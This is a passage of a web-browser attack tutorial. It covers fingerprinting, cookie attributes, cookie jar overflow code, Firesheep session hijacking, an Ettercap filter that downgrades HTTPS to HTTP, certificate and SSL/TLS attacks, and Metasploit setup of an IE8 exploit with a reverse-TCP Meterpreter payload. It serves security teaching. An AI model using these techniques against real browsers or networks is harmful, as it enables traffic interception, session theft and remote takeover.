WEB BROWSER ATTACKS WEB BROWSER ATTACKS Introduction ...... 4 What is Web Browser? ...... 4 Mozilla Firefox ...... 5 Google Chrome ...... 6 Apple Safari ...... 7 Enumerating Web Browsers ...... 7 Using HTTP Headers ...... 8 Using DOM Properties ...... 11 What is HTTP/2? ...... 12 Is this actually good? ...... 12 What is an Http Cookie? ...... 14 Why are Cookies of Interest? ...... 14 What is a Cookie jar? ...... 14 Cookie Structure ...... 15 What are Cookie Attributes? ...... 16 Cookie Secure Attribute ...... 16 Cookie Domain/Path Attribute ...... 16 Cookie Expires Attribute ...... 16 Cookie HTTPOnly Attribute ...... 17 Bypassing Path Attribute Restrictions ...... 17 Cookie Jar Overflow ...... 17 Tracking Cookies ...... 22 Session-Hijacking Attacks ...... 23 Firesheep ...... 23 Bypassing HTTPS ...... 24 Downgrade HTTPS to HTTP using Ettercap filters ...... 24 What is Ettercap? ...... 24 What is MITM? ...... 24 Ettercap Filters? ...... 25 How to hack Certificates ...... 26 Fake Certificates ...... 26 Vulnerabilities in SSL/TLS Layer ...... 27 Attack on browser using Metasploit ...... 28 Exploit with Metasploit ...... 28 Metasploit Browser Autopwn ...... 33 Metasploit IE-10 exploit ...... 35 Reference ...... 38
WEB BROWSER ATTACKS Page 3 of 38 Introduction Through this mini course, you will learn:
• What a browser is • Different types of browsers • How to enumerate web browsers using the HTTP header • Using DOM properties, working on http cookies • Why a cookiejar is required in a browser • Cookie structure and its attributes • Downgrade https to http • How hacker hack using fake certificates and by leveraging SSL/TLS vulnerability • How you can exploit browser-based vulnerability using Metasploit.
What is Web Browser? A web browser, commonly referred to as a browser, is a software application for retrieving and information resources on the World Wide Web. An information resource is identified by a Uniform Resource Identifier/Locator (URI/URL) and may be a web page, image, video or other piece of content. Hyperlinks presented in resources enable users to navigate their browsers easily to related resources. Although browsers are primarily intended to use the World Wide Web, they can also be used to access information provided by web servers in private networks or files in file systems. In other words, the browser is a power full tool through which you can access internet.
The major web browsers are Mozilla Firefox, Internet Explorer, Google Chrome, Opera, and Safari
WEB BROWSER ATTACKS Page 4 of 38 Mozilla Firefox Mozilla Firefox, known simply as Firefox, is a free and open-source web browser developed for Windows, OS X, and Linux, with a mobile version for Android, by the Mozilla Foundation and its subsidiary, the Mozilla Corporation. Firefox uses the Gecko layout engine to render web pages, which implements current and anticipated web standards.
FIGURE 1: MOZILLA FIREFOX
WEB BROWSER ATTACKS Page 5 of 38 Google Chrome Google Chrome is a freeware web browser developed by Google. It used the WebKit layout engine until version 27 and, with the exception of its iOS releases, from version 28 and beyond uses the WebKit fork Blink. It was first released as a beta version for Microsoft Windows on September 2, 2008, and as a stable public release on December 11, 2008.
FIGURE 2: GOOGLE CHROME BROWSER
WEB BROWSER ATTACKS Page 6 of 38 Apple Safari Safari is a web browser developed by Apple Inc. included with the OS X and iOS operating systems. First released as a public beta on January 7, 2003, on the company's OS X operating system, it became Apple's default browser beginning with Mac OS X v10.3 "Panther". The native browser of iOS is also called Safari, but has a different graphical user interface (GUI) and uses a different WebKit version and application programming interface (API)
FIGURE 3: APPLE SAFARI Browsers are always prime targets for hackers. Some browser vendors have already introduced a Bug Bounty Program, which says, “if you are a security researcher or white hat hacker and you think you have found any security vulnerability report it to us and get some cash rewards and add your name in Security Hall of Fame”. This makes browsers an even more interesting target for hackers. As many of the users are managing their bank account online, doing online shopping, and paying though a credit card, or debit card, browser security is mandatory to prevent users from online fraud or hacking.
In the next section, we will have a look at how to launch attacks directly against the web browser, how to fingerprint browsers, attack sessions and cookies, HTTPS attacks, and many other techniques.
Enumerating Web Browsers Before exploiting any target, it’s good to explore its version and other information as much as you can. The browser fingerprint is information collected about a remote computing device for the purpose of identification of version. Fingerprinting identifies the platform and version of a browser and identifies a specific browser such as Mozilla, Internet Explorer, Opera, and Safari etc. Now, we have understood how browser fingerprinting is important however, question arises how to do that. Well, let’s have a looks at HTTP request headers, DOM properties.
HTTP header fields are components of the header section of request and response messages in the Hypertext Transfer Protocol (HTTP). They define the operating parameters of an HTTP transaction. This contains browser information such as its browser name, version etc. By looking at the DOM properties,
WEB BROWSER ATTACKS Page 7 of 38 you can see what information the browser has stored about a page that’s being viewed. This is most helpful features as it’s tells you many browser feature.
After enumerating the browser, you can investigate how browser bugs can be used to identify a browser. By exploring these features, you can figure out whether browser is updated or vulnerable. Information gathering by browser’s User-Agent (UA) header and DOM properties is useful for validating your fingerprinting results. It’s also true, that User Agent header can be spoofed very easily so it shouldn’t always be trusted. To explore more on this please refer “Attacks on Plugins” Mini course where I have explained many ways to fingerprinting of browser and its version with plugins etc. Using HTTP Headers HTTP Headers are included in every HTTP request and response, which helps the browser and the server agree on how information will be transferred, as well as share information about web pages. Let’s take a look at below screenshot to understand better.
FIGURE 4: SCREENSHOT OF BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM
WEB BROWSER ATTACKS Page 8 of 38 You can also determine your browser http headers by visiting http://echo.opera.com. The first line shows the request method. Normally these are GET, POST and HEAD. The second line contains the HOST header, which tells the domain information. The USER-AGENT header is the most informative, but also the most easily spoofed header. You can see from the below screenshot that the browser is clearly indicating that it is Firefox but USER AGENT says Internet explorer.
FIGURE 5: SCREENSHOT OF FALSE BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM The remaining headers indicate communication parameters. The Accept header indicates the type of information that the browser will accept as a response, and the Accept-Language header indicates the desired language. The Accept- Encoding header indicates preferences for how to compress the data returned in order to save bandwidth, the Connection header indicates that connection keep-alive which means accept more requests.
WEB BROWSER ATTACKS Page 9 of 38 To understand more about how many people actually spoof the User-Agent header, we can install “User-Agent Switcher” Add-on on Mozilla Firefox. This is widely use add-on for changing or spoofing User-Agent. Once it’s installed it typically looks as follows:
FIGURE 6: SCREENSHOT OF DISPLAY INSTALLED USER-AGENT ADD-ON ON MOZILLA FIREFOX
WEB BROWSER ATTACKS Page 10 of 38 These are typical Firefox browser requests; let’s have a look at the request header in Internet explorer.
FIGURE 7: SCREENSHOT OF IE BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM The position of the Host header in Mozilla Firefox is first, however in IE 8.9, it’s closer to the end. Other headers are in the same order; however, they are before the User-Agent instead of after. Therefore, changing the position of the header is more difficult than to change the contents of the User-Agent field, so if you see Host headers last, it is a strong indication that it could be Internet Explorer. Using DOM Properties To be more accurate, for enumerating the browser version, the DOM is one of the most reliable methods. The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML, and XML documents. The nodes of every document are organized in a tree structure, called the DOM tree. Objects in the DOM tree may be addressed and manipulated by using these methods on the objects. The public interface of a DOM is specified in its application-programming interface (API). For instance, other information ranging from resolution to navigation functions help developers interact with the browser more easily. As new features are implemented, it enables you to enumerate the browser and its version is being used.
WEB BROWSER ATTACKS Page 11 of 38 What is HTTP/2? HTTP/2 (originally named HTTP/2.0) or hypertext transfer protocol/2.0 is the second major version of the HTTP network protocol used by the World Wide Web.
Well, look at the address bar in your browser. Yes, http/2.0 is successor version of http.
A new version of the reliable and ubiquitous HTTP protocol was recently published as a draft by the organization in charge of creating standards for the Internet, the Internet Engineering Task Force (IETF). This means that the old version, HTTP/1.1, will be replaced by a new one, HTTP/2. This update should improve the way browsers and servers communicate. Also, allowing for faster transfer of information while reducing the amount of raw horsepower needed. Is this actually good? Yes, currently we are using HTTP/1.1 which is last updated in 1999, quite old stuff, Modern web application nowadays include many different stuff such as HTML, CSS, JavaScript, images, video and Flash animations etc. In order to transfer that information, the browser has to create several connections, and each one has details about the source, destination and contents of the communication package or protocol. That puts a huge load on both the server delivering the content and your browser.
Due to heavy data transfer, the processing power they require can lead to slowdowns in the application performance. For many companies such as ecommerce, share market, and financials, a slow website can translate directly into lost money, especially for ecommerce services where long load times mean a bad user experience. Do you know SPDY? SPDY, pronounced speedy, is an open networking protocol developed primarily at Google for transporting web content. SPDY manipulates HTTP traffic, with particular goals of reducing web page load latency and improving web security. SPDY achieves reduced latency through compression, multiplexing, and prioritization, although this depends on a combination of network and website deployment conditions. The name "SPDY" is a trademark of Google and is not an acronym.
WEB BROWSER ATTACKS Page 12 of 38 Google decided to dramatically overhaul HTTP/1.1 and create SPDY; the results have been impressive and yes speedy. In common language, communication between a server and client (browser using SPDY is much faster, even when encryption is applied. At a minimum, the transfer speed with SPDY can improve by about 10 percent and, in some cases, can reach numbers closer to 40 percent). What is a protocol? Protocol is set of rules that govern how information is transferred from one computer to another. Every protocol is different from each other; however, some common things are there such as header, payload and footer. The header contains the source and destination addresses and type of data, size of data, etc. The payload contains the actual information, and the footer holds some form of error detection. Some protocols also support a feature called "encapsulation," which lets them include other protocols inside of their payload section.
Is HTTP/2 better? Well, in laymen’s terms, HTTP/2 loads webpages much faster, saving everyone time simple and short.
HTTP/2 improves speed mainly by creating one constant connection between the browser and the server. This reduces the amount of data being transferred. Moreover, it transfers data in binary (0 and 1 format), a computer's native language, rather than a simple text. So that your computer doesn't have to translate information into a binary format this save good amount of time. HTTP/2 has a feature called “multiplexing" (sending and receiving multiple messages at the same time), the use of prioritization so more important data is transferred first, compression and "server push," where a server makes an educated guess about what your next request will be and sends that data ahead of time quite impressive and intelligent.
IIS (the Windows web server) already supports HTTP/2 under Windows 10 and it's expected that Apache and Nginx will offer support very soon (SPDY is already supported through extensions). This means that sooner we all will be using HTTP/2. This will help for those who hate slow internet or buffering time J Is it secure? Oh yes, it is more secure then HTTP 1.1 protocol as this protocol defines the profile of TLS that is required, which includes the version (TLS 1.2), a cipher suite blacklist, and extensions used.
In HTTP/2 secure connection, the new ALPN which stand for Application Layer Protocol Negotiation extension to the TLS protocol allows users to negotiate HTTP 2.0 support as part of the regular TLS handshake, The client sends the list of protocols it supports (e.g., http/2.0); the server selects one of the advertised protocols and confirms its choice by sending the protocol name back to the client as part of the regular TLS handshake. Establishing an HTTP 2.0 connection over a regular, non-encrypted channel requires a bit more work. Because both HTTP 1.0 and HTTP 2.0 run on the same port (80), in the absence
WEB BROWSER ATTACKS Page 13 of 38 of any other information about the server's support for HTTP 2.0, the client will have to use the HTTP Upgrade mechanism to negotiate the appropriate protocol.
What is an Http Cookie? An HTTP cookie also known as web cookie, Internet cookie, browser cookie or cookie is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity. Cookies were designed to be a reliable mechanism for websites to remember stateful information as HTTP is a stateless protocol (such as items in a shopping cart) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited by the user).
Why are Cookies of Interest? An attacker always interested in exploiting/stealing user valid Cookies (valid HTTP Cookie referred as a cookie assigned after successfully login). We will look deeper at cookies and determines why cookies are so important, how they work, and what they look like as part of web transactions. We will also look at how to abuse cookies as part of more complex browser attacks. Cookies are used for a wide variety of things, such as storing a session identifier also known as a SessionID, or to identify by application that who you are. It also stores session data such as username, session token, “token which indicate how long you are valid (for session timeout)”. Cookies can be persistent or non-persistent across the session. Browsers either can delete cookies by browser restarts or can be deleted as soon as the browser is closed. Stealing cookies means stealing user sessions, an attacker can hijack user session and perform unauthorized action if he is able to steal the session which also known as session hijacking. What is a Cookie jar? The “cookie jar” an area in browser where all cookies store, maintained on behalf of web applications. Cookie jars are the local browser storage area that contains the cookie information as set by web applications. The web application asks the browser to store a piece of information for a specific amount
WEB BROWSER ATTACKS Page 14 of 38 of time. When the user revisits a page that’s in scope for the cookie, the browser typically sends the cookies with every HTTP request. This allows the application to identify a specific user visiting the site. Browser store each application cookies against the Host (host are application domain address such as example.com) separately. Cookie Structure Cookie transmitted both side between the browser to web application and vice versa. Browser sends cookie to application against HOST and application sends a Set-Cookie response, which typically updates cookie in Cookiejar.
Cookies include
• Cookie value • Cookie expiring • Cookie Path • Domain the cookie is valid for • HTTPONLY cookie Flag • SECURE cookie flag etc.
Let’s have a look on where cookie placed in HTTP request and HTTP response. GET / HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; amSessionId=7923333001 Connection: keep-alive HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 9605 Content-Type: text/html; charset=utf-8 Expires: -1
Server: Microsoft-IIS/8.0
WEB BROWSER ATTACKS Page 15 of 38 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; path=/; HttpOnly; Secure;
Set-Cookie: amSessionId=7923333001; path=/ X-Powered-By: ASP.NET Date: Sun, 31 May 2015 12:09:23 GMT
As demonstrated above, the cookies are being sent as part of the HTTP request in a cookie=value format with a semicolon (;) separator. When the cookies are being sent by the application, each Set-Cookie gets its own line. What are Cookie Attributes? Cookies attributes tell browser that how long cookie should live, when to send the cookie, which domain or path the cookie belongs to, and some other information as well. These attributes are sent by application server with every response. Cookies are primarily used for authentication and maintaining sessions. Hence, securing a cookie effectively means securing a user’s identity. Cookies can be secured by using following cookie attributes. These attribute also known as cookies flag.
• Secure • Domain and Path • HTTPOnly • Expires Cookie Secure Attribute If secure flag is implemented on cookies then cookie can only be transmitted over an encrypted connection (i.e. HTTPS). This makes the cookie less likely to be exposed to cookie theft via man in the middle attack also known as eavesdropping. Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Secure; Cookie Domain/Path Attribute Both Domain and Path flag define the scope of the cookie. They tell the browser what website the cookie belongs to. However, Remember that “Application A” cannot set cookie for “Application B”. For instance, the website example.com cannot set a cookie that has a domain of foo.com.
The ‘domain ‘attribute define the domain for which the cookie is valid and need to submit with every request. If this Domain attribute is not set, then the hostname of the server is used as the default value.
‘path ‘attribute define the URL or path for which the cookie is valid. The default path attribute is set as ‘/’. Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Domain=httpsecure.org; Path=/; Cookie Expires Attribute This attribute is used to tell browser that how long the cookie should alive, when to expire or deleted.
WEB BROWSER ATTACKS Page 16 of 38 If Expire attribute is not specified, then the cookie will stay life time in the browser Cookiejar. Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Expires=Thu, 09-july-2015 00:00:01 GMT; Cookie HTTPOnly Attribute The HttpOnly attribute tell browser not to expose cookies through channels other than HTTP and HTTPS requests. In other words, Cookies cannot be accessible via JavaScript (using document.cookie). Therefore, an attacker cannot be stolen cookie via cross-site scripting. Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; HttpOnly
Bypassing Path Attribute Restrictions For instance, let’s code an application with two different cookie first, http://www.example.com/public and the second cookie linked to http://www.example.com/private It is quite obvious that a malicious web app on http://www.example.com/public cannot read out the http://www.example.com/private cookie. Here, Path attribute should be a security boundary Right, But you can still bypass. Remember, the same origin policy applieson the domain name, not to the path. Also, document.cookie in the context of a page from either application will not contain the other’s cookies, an application can craft a page that contains an iframe which in turn contains a page from the other application. Below mentioned script in can then access the other application’s cookie. The browser allows this because both applications are in the same domain.
For instance, iframe snippet code
Cookie Jar Overflow Cookie is the most important and sensitive part in every application. Today, most application use cookie to maintain user session. Application server set cookie in response that is stored in the browser Cookie jar. The cookie jar holds so many cookies against HOST header. You can modify cookie via JavaScript only if you HttpOnly not set. Alex Kouzemtchenkoand and Chris Evan determined that you could
WEB BROWSER ATTACKS Page 17 of 38 overflow the cookie jar to drop older cookies and replace with your own cookie. Through this, you can control how a user interacts with a site.
Have a look at an example: require 'rubygems' require 'thin' require 'rack' require 'sinatra' require 'json' class CookieDemo < Sinatra::Base get "/" do link_url = "http://www.google.com" if !request.cookies['link_url'] then response.set_cookie "link_url", {:value => link_url, :httponly => true} else link_url = request.cookies['link_url'] end 'Secret Login Page
' end end @routes = { "/" => CookieDemo.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("example.com ", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start
WEB BROWSER ATTACKS Page 19 of 38 In the above example, the link_url cookie is set when the browser loads the page. When you revisit the page, the cookie is retrieved and the URL is echoed back as the HREF location for the Secret Login Page link. URLs are rewritten accordingly. In this case, the URL is simply stored in a cookie. When you load the page, you see two buttons: an Attempt Change button and a Spam Cookies button. To explain you overflowing the cookie jar in the better way, load the page and hit refresh. When you look at the URL of the link, it will read http://www.google.com, as you can see in below screenshot. After reloading, it still remains the same.
FIGURE 8: SCREENSHOT: APPLICATION WITH THE DEFAULT LINK
WEB BROWSER ATTACKS Page 20 of 38 When you click on Attempt Change button as shown above, the browser attempts to overwrite the HttpOnly cookie with a new cookie pointing to http://blog.example.com. If you click the button and hit Reload, the link hasn’t changed, as mentioned in the below screenshot. This is because you can’t overwrite the HttpOnly cookie through JavaScript.
FIGURE 9: SCREENSHOT: ALERT BOX IS DISPLAYED, BUT THE LINK DOESN’T CHANGE. When you click on the Spam Cookies button as shown in below screenshot and then reload the page, the link is now pointing to http://example.com. So how this works? You actually overflowed the cookie jar with new cookies, which causing the older cookies to replace with your new cookie and set the link_url cookie again with JavaScript. This results in it being the last cookie in and the one that will be presented to Ruby when the page is loaded.
WEB BROWSER ATTACKS Page 21 of 38
FIGURE 10: SCREENSHOT: THE UPDATED LINK FROM OVERFLOWING THE COOKIE JAR We have shown you how to take an insecure application and target a Cookiejar via JavaScript to control how the browser interacts with web pages and targets. This should work in Firefox.
Tracking Cookies Tracking cookies are used to track user’s web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:
• If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. Therefore, the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page. • From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
WEB BROWSER ATTACKS Page 22 of 38 Using JavaScript tracking user activity is quit an easy task. You can do the using below snip code: var exp = new Date(new Date().getTime() + daysInMilliseconds(5)).toGMTString(); document.cookie=" link_url=http://example.com;expires=" + exp;
Alternatively, you can Google it to find more. The above-mentioned code will continue to persist across crashes for the engagement window, which in this case is five days. If you want to track users for longer periods of time, then the Evercookie project is best for you. For simple tracking, Evercookie makes deleting cookies very difficult for the target,
About Evercookie: evercookie is a javascript API available that produces
extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.
evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.
Visit here, http://samy.pl/evercookie/ to learn more about Evercookie.
Session-Hijacking Attacks HTTP session hijacking is a method of impersonating another user by stealing their session. An attacker can sniff user session id or cookies via MITM (Man in the middle) attack. By stealing user valid session id an attacker can easily perform unauthorized action where application allow to perform any action as thinking that he is a legitimate user. Though session impersonation attacks have been around for a while, they became a big attack after releasing Firesheep. Firesheep Firesheep is an extension for the Firefox (all version) web browser that uses a packet sniffer to intercept unencrypted cookies from websites such as Facebook and Twitter. As cookies are transmitted over networks, packet sniffing is used to discover identities on a sidebar displayed in the browser, and allows the user to instantly take on the login credentials of the user by double-clicking on the victim's name
WEB BROWSER ATTACKS Page 23 of 38 Download Link: https://codebutler.github.io/firesheep/
By double click on the firesheep icon of the target you wish to impersonate and you will have their cookies copied to your browser, and can access the target site. Firesheep sniff session cookies that not set with the Secure flag, reason being they were required to be submitted over both HTTP and HTTPS channels. Once, you impersonate the user session you can work until session invalidated by either the user logging out and the session timeout.
Bypassing HTTPS HTTPS stand for hypertext transfer protocol secure, which means whatever you are communicating with application server, is over secure channel instead of plain text. Therefore, an attacker could not be sniff your sensitive information such as username, password, session-id, credit card, debit card details, PII etc. Generally, user recognizes this with padlock icon in the corner of your browser and thinks that the site is secure. Actually, it’s not true. The lock icon doesn’t actually mean the page is secure. We have a number of approaches to attack HTTPS pages. Here, we will talk in respect of three
• HTTP downgrade attacks • Certificate attacks • SSL/TLS attacks
Downgrade HTTPS to HTTP using Ettercap filters An attacker can force the browser to access the HTTP (Plain text protocol) of the application instead of the HTTPS (encrypted version) to view or sniff sensitive information such as PII, Financial details, stealing cookies, stealing username and password etc.
Modern web applications configured to send back a 302 response to HTTP requests and redirect the browser to the HTTPS version of the site. However, this is not save actually it’s a critical point where attacker can take control and get in the middle (MITM). Following are best tools to perform this attack.
• sslstrip • Ettercap What is Ettercap? Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. What is MITM? A man-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. One example is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to
WEB BROWSER ATTACKS Page 24 of 38 make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. Ettercap Filters? Filters are great feature of Ettercap. An attacker can do lot of stuff while playing with them. Irongeek has played with Ettercap Filters in the past to rewrite img tags. (to know more visit http://www.irongeek.com/i.php?page=security/ettercapfilter)
Let’s start with the below mentioned filter (assuming router is 192.168.0.1 and victim is 192.168.0.100): # Requests if (ip.proto == TCP && tcp.dst == 80) { # msg("[HTTP Response Filter] HTTP request seen.\n");
- if (search(DECODED.data, "https") || search(DATA.data, "https")){ + if (search(DECODED.data, "https")){ + replace("https", "http"); + msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); + } + if (search(DATA.data, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } @@ -50,7 +54,11 @@ if (ip.proto == TCP && tcp.dst == 80) {
# Response if (ip.proto == TCP && tcp.src == 80) { # msg("[HTTP Response Filter] HTTP response seen.\n"); - if (search(DECODED.data, "https") || search(DATA.data, "https")){ + if (search(DECODED.data, "https")){ + replace("https", "http"); + msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); + } + if (search(DATA.data, "https")){
WEB BROWSER ATTACKS Page 25 of 38 replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); }
You should see the following output: ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from hrf.ef... Listening on eth0... (Ethernet) (...)
[HTTP Response Filter] Encoding zapped. [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] *** HTTPS ZAPPED from response [HTTP Response Filter] Encoding zapped. [HTTP Response Filter] *** HTTPS ZAPPED from response [HTTP Response Filter] *** HTTPS ZAPPED from response (...) How to hack Certificates There are two attacks on certificate. In first attack, we replace one certificate with another certificate. Executing this attack is quite simple however, target can see this easily. The second type of attack is more complicated, and leverages a browser bug to present a certificate that will be incorrectly trusted by the browser. Fake Certificates Using a fake certificate is not a hard task, If you have used proxy, Ettercap, or any other intercepting tool, the idea is quite same. Show a fake certificate to the target’s browser and act as a middleman for their communication just similar to man in the middle. Using fake certificate for attack is quite popular but also has a drawback that there will be an error message seen by the user saying that the certificate is invalid for the site. In order to perform this attack successfully user has to click and add exception. This attack totally depends upon the user if he except untrusted certificate dialog box then an attacker can perform his malicious task. Flawed Certificate Validation Second type of attack, Certificate validation attack this takes advantage of problems with how browsers manage certificate validation. For instance, this attack was possible in several iPhone applications somewhere in 2013. Nick Arnott found an issue that numbers of popular iPhone applications were not
WEB BROWSER ATTACKS Page 26 of 38 checking to see if certificates were valid. An attacker by presenting self-signed certificates, or any certificate at all, the applications did not show error message to the user that this is untrusted certificate. Similar security vulnerabilities have been found in various Android applications too. Stanford researchers and Austin universities researchers were found similar flaws in the Chase mobile banking application. This app was vulnerable to certificate-handling vulnerability, By performing this attack an attacker can sniff credentials, credit card data, or other information by providing a self-signed certificate and then monitoring the connection for sensitive data. Vulnerabilities in SSL/TLS Layer SSL and TLS both are the encryption protocols used for secure web browsing. Similar to many other technical software implementations, they have some security issues as well. These weaknesses allow disclosure of all communication channels. SSL and TLS both are important ans required, because to transmit securely critical cookie data or other sensitive information such as credit card, username and password etc. Three such attacks that have gained notoriety are the BEAST attack, the CRIME attack, and Heartbleed attack. BEAST Attack BEAST stand for Browser Exploit Against SSL/TLS. SSL Beast is an exploit first revealed in late September 2011 that leverages weaknesses in cipher block chaining (CBC) to exploit the Secure Sockets Layer (SSL) protocol. The CBC vulnerability can enable man-in-the-middle (MITM) attacks against SSL in order to silently decrypt and obtain authentication tokens, providing hackers with access to the data passed between a Web server and the Web browser accessing the server. While SSL BEAST attacks affect only the Transport Layer Security (TLS) 1.0 version of SSL and not later versions such as TLS 1.1 and 1.2, TLS 1.0 remains the overwhelmingly predominant version used by both Web servers and browsers. a JavaScript-based demonstration of the SSL BEAST attack by researchers Juliano Rizzo and Thai Duong, developers of Google Chrome and other major Web browsers started taking steps to create workarounds for mitigating the risks of SSL BEAST attacks. CRIME Attack Compression Ratio Info-leak Made Easy (CRIME) is a SSL/TLS security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, allowing the launching of further attacks. CRIME is a client-side attack, but the server can protect the client by refusing to use the feature combinations that can be attacked. For CRIME, the weakness is Deflate compression. This alert is issued if the server accepts Deflate compression. HEARTBLEED Attack The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual
WEB BROWSER ATTACKS Page 27 of 38 content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
Attack on browser using Metasploit Metasploit is not a new name. Penetration testers have used this great tool for many years for exploiting. Metasploit is a penetration-testing framework. It has aspects designed for every level of the penetration-testing life cycle. Such as exploit developers, exploit consumers, penetration testers, or system administrators, the Metasploit user interface simplifies the process of executing exploits, Metasploit provide an easier method to test their own systems. Also, usage, is quite simple all the information is freely available so that new guy can can understand what the exploit is, what the impact is, how it works, how to detect it, and have an easily repeatable place to go for testing.
Metasploit has auxiliary modules for discovery and enumeration that allow you to:
• Find vulnerable machines • Determine what services are running • Enumerate services • Gather specific information about protocols on systems
To enumerate what is on the network and how vulnerable they are, and what types of vulnerability it has; all of this completely free. We will see how you can use Metasploit for browser-based attacks; we will talk about exploiting a Windows 7 system running Internet Explorer 8 with Metasploit and get a remote shell. Exploit with Metasploit To use Metasploit, the Kali Linux distribution is best way you can download the same from http://www.kali.org/.
Kali is a standard penetration testing distribution this includes many penetration standard tools, script, framework, software such as ssh, apache, perl, python, curl Metasploit, etc. by default. Metasploit runs on Ruby, so if you wish to run the same into windows you can use that way also get Metasploit from http://www.metasploit.com/.
If you are using kali Linux, Open terminal and type msfconsole to start with Metasploit. Your output should show msf >. Metasploit basic include few things, such as:
• Searching module • Payload • Information about a module
To search for all modules for IE 8, you need to enter search IE8, as shown below: msf > search IE8 [!] Database not connected or cache not built, using slow search
Matching Modules
WEB BROWSER ATTACKS Page 28 of 38 ======Name Disclosure Date Rank Description ------exploit/windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 00:00:00 UTC great Adobe Flash Player AVM
Verification Logic Array Indexing Code
Execution exploit/windows/browser/ie_cgenericelement_uaf 2013-05-03 00:00:00 UTC good MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
To get more information about a module, you need to enter info module name.
For instance: msf> info exploit/windows/browser/ie_cgenericelement_uaf Name: MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability Module: exploit/windows/browser/ie_cgenericelement_uaf Version: 0 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Good
WEB BROWSER ATTACKS Page 29 of 38
This exploit will work fine with following targets:
• IE 8 on Windows XP SP3 • IE 8 on Windows Vista • IE 8 on Windows Server 2003 • IE 8 on Windows 7
To select best Metasploit exploit against target, the first thing you need to do is go through the browser fingerprinting process. To learn about the target such as its vendor name, version, plugin information, plugin version, operating system information etc. you can do with the the BeEF frame work, For this instance, we are targeting a Windows 7 system running IE 8 on 32-bit architecture. Once you have gathered the information, you can pick recent vulnerabilities available for the target’s platform and use them. As we are using browser exploits, Metasploit will launch a web server to accept incoming browser requests. The Metasploit web server can have multiple endpoints, or URI Paths, that can be attached. This allows a single Metasploit instance to serve multiple exploits on a single network port without having to launch a separate server for each.
If you want to exploit a particular IP address, then, you will need to modify the SRVHOST variable to set it as that IP. Else, you only need to set the SRVPORT, URIPATH, and payload variables. You can do this by entering SET commands:
• set URIPATH /iebrowser • set SRVPORT 80 • show options • show targets • set payload windows/meterpreter/reverse_tcp • show options
This sets the path to / iebrowser and the server to listen on port 80. You might have a number of payload options, you can see by typing in show payloads command. Else, go with the meterpreter payload. This payload has many advance features to facilitate post-exploitation.
• Meterpreter has two primary sub-options: bind shells and reverse shells.
Bind shells create a listener on the target system. Once the listener is started, the shell you have selected will be attached to the port. When you go to access that port, the connection is completed and you will have access to the shell. However, process has some potential problems.
